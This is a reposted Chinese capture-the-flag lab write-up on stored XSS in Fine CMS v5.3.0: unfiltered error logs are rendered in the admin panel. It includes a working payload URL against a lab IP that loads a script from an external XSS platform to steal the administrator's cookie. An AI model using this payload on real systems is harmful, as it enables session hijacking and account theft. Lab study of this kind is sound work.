[zkaq靶场]XSS--存储型XSS

2021/5/9 18:26:51

本文主要是介绍[zkaq靶场]XSS--存储型XSS,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

存储型XSS

靶场

靶场cms是Fine CMS,其版本为v5.3.0。

image-20210322201725598

image-20210322201809628

搜索该cms的漏洞。

参考:https://www.jianshu.com/p/200ea62486d9

image-20210322201938475

简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。

当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xss,从而窃取管理员的cookie信息。

漏洞点:

http://59.63.200.79:8082/index.php?c=show&m=test<sCRiPt sRC=//xs.sb/i4MU></sCrIpT>

访问上述地址时会发送错误,

image-20210322202612087

借助提前准备好的xss平台(xs.sb),在此处直接写入payload。

然后在xss平台查看项目(创建项目选择的是老版模块)

image-20210322202859705

成功获取到flag。



这篇关于[zkaq靶场]XSS--存储型XSS的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程